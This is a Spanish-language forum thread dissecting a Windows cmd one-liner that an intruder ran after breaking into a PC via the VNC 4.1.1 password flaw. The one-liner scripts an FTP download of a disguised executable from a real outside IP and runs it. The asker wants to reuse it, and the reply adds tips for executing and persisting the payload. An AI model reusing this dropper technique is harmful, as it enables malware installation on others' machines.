Buenas , un amigo tenia instalado el vnc 4.1.1 ( el que tiene el bug de la contraseña ) y entraron a su pc y con gran rapidez pusieron esto en inicio ejecutar:
cmd /c echo OPEN 201.248.192.112 2920>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_noºrton.exe&del x&exit
Quisiera que me explicaran ese codigo , por lo que veo se conecta a un servidor ftp en 201.248.192.112 por el puerto 2920 para descargar el archivo 84785_norton.exe es así? y quiero saber donde se almacena ese archivo descargado y si es ejecutado a la vez por ese codigo , quisiera saber como funciona como por ejemplo esas letras -n -s , etc , para despues poder aplicarlo yo alguna vez :p ..
Saludos

Claro, primero creo un archivo llamado "x" mediante el comando echo. Lo que hizo fue agregar linea por linea los comandos del FTP, para que se conecte a ese ip/puerto y descargue el archivo.
Creo un archivo "x" con este contenido: (guardado en el directorio "windows")
OPEN 201.248.192.112 2920
GET 84785_norton.exe
QUIT
Después ejecuto el FTP con la opción -n para que no le pida usuario/contraseña y entre como anónimo (probablemente el tenia el FTP configurado así). Por otro lado, la opción -s carga los comandos de un archivo externo ("x") de modo que ejecuto "ftp -n -s:x" (lo que ejecuto los comandos, de entrar al FTP, bajar archivo y salir). Finalmente borro el archivo "x" y cerro la ventana de DOS con exit.
Hubiese sido aun mejor si al terminar el proceso, hubiese ejecutado el archivo con "start 84785_norton.exe". Pero de seguro el lo agrego al registro o algo para que se ejecute en cada reinicio o cada x tiempo.
Saludos,